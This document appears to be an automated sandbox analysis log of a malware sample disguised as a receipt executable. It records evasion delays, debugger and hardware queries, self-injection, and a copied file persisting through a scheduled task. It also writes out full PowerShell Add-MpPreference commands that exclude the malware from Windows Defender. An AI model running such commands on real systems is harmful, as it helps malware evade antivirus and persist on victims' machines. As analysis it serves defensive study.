            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: Receipt-#202431029B.exe PID: 7552, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: XetHVID.exe PID: 8064, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Memory allocated: A20000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Memory allocated: 2520000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Memory allocated: 2340000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Memory allocated: 8C70000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Memory allocated: 9C70000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Memory allocated: 9E90000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Memory allocated: AE90000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Memory allocated: 1390000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Memory allocated: 2EE0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Memory allocated: 2DE0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Memory allocated: 1350000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Memory allocated: 2B30000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Memory allocated: 4B30000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Memory allocated: 8E00000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Memory allocated: 9E00000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Memory allocated: A010000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Memory allocated: B010000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Memory allocated: 2A00000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Memory allocated: 2A30000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Memory allocated: 4A30000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Thread delayed: delay time: 240000
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Thread delayed: delay time: 239875
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Thread delayed: delay time: 239765
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Thread delayed: delay time: 239612
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Thread delayed: delay time: 239485
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Thread delayed: delay time: 239375
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Thread delayed: delay time: 239196
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Thread delayed: delay time: 239093
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Thread delayed: delay time: 238985
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Thread delayed: delay time: 238875
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Thread delayed: delay time: 238766
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Thread delayed: delay time: 238618
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Thread delayed: delay time: 238507
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Thread delayed: delay time: 238391
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Thread delayed: delay time: 238265
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Thread delayed: delay time: 238156
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Thread delayed: delay time: 238031
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Thread delayed: delay time: 237904
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Thread delayed: delay time: 237780
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Thread delayed: delay time: 240000
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Thread delayed: delay time: 239844
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Thread delayed: delay time: 239734
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Thread delayed: delay time: 239625
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Thread delayed: delay time: 239516
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Thread delayed: delay time: 239406
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Thread delayed: delay time: 239297
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Thread delayed: delay time: 239188
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Thread delayed: delay time: 239063
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Thread delayed: delay time: 238953
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Thread delayed: delay time: 238844
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Thread delayed: delay time: 238718
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Thread delayed: delay time: 238569
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Thread delayed: delay time: 238448
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Thread delayed: delay time: 237764
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Thread delayed: delay time: 237655
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Window / User API: threadDelayed 1324
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Window / User API: threadDelayed 1319
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4808
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 707
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4360
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 434
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Window / User API: threadDelayed 3642
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Window / User API: threadDelayed 6167
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Window / User API: threadDelayed 537
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Window / User API: threadDelayed 2131
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588 Thread sleep time: -11068046444225724s >= -30000s
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588 Thread sleep time: -240000s >= -30000s
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588 Thread sleep time: -239875s >= -30000s
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588 Thread sleep time: -239765s >= -30000s
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588 Thread sleep time: -239612s >= -30000s
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588 Thread sleep time: -239485s >= -30000s
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588 Thread sleep time: -239375s >= -30000s
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588 Thread sleep time: -239196s >= -30000s
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588 Thread sleep time: -239093s >= -30000s
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588 Thread sleep time: -238985s >= -30000s
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588 Thread sleep time: -238875s >= -30000s
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588 Thread sleep time: -238766s >= -30000s
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588 Thread sleep time: -238618s >= -30000s
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588 Thread sleep time: -238507s >= -30000s
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588 Thread sleep time: -238391s >= -30000s
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588 Thread sleep time: -238265s >= -30000s
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588 Thread sleep time: -238156s >= -30000s
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588 Thread sleep time: -238031s >= -30000s
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588 Thread sleep time: -237904s >= -30000s
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588 Thread sleep time: -237780s >= -30000s
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7572Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep count: 4808 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880Thread sleep count: 707 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8052Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8016Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7472Thread sleep time: -16602069666338586s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -10145709240540247s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -240000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -239844s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -239734s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -239625s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -239516s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -239406s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -239297s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -239188s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -239063s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -238953s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -238844s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -238718s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -238569s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -238448s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -237764s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -237655s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7288Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 3180Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 240000Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 239875Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 239765Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 239612Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 239485Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 239375Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 239196Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 239093Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238985Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238875Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238766Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238618Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238507Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238391Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238265Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238156Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238031Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 237904Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 237780Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 240000
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 239844
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 239734
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 239625
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 239516
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 239406
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 239297
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 239188
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 239063
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 238953
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 238844
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 238718
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 238569
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 238448
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 237764
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 237655
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 922337203685477
            Source: Receipt-#202431029B.exe, 00000008.00000002.4100928252.0000000001227000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe"
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XetHVID.exe"
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe"
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XetHVID.exe"
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Memory written: C:\Users\user\Desktop\Receipt-#202431029B.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Memory written: C:\Users\user\AppData\Roaming\XetHVID.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe"
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XetHVID.exe"
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp2668.tmp"
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Process created: C:\Users\user\Desktop\Receipt-#202431029B.exe "C:\Users\user\Desktop\Receipt-#202431029B.exe"
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp13D7.tmp"
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Process created: C:\Users\user\AppData\Roaming\XetHVID.exe "C:\Users\user\AppData\Roaming\XetHVID.exe"
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Users\user\Desktop\Receipt-#202431029B.exe VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
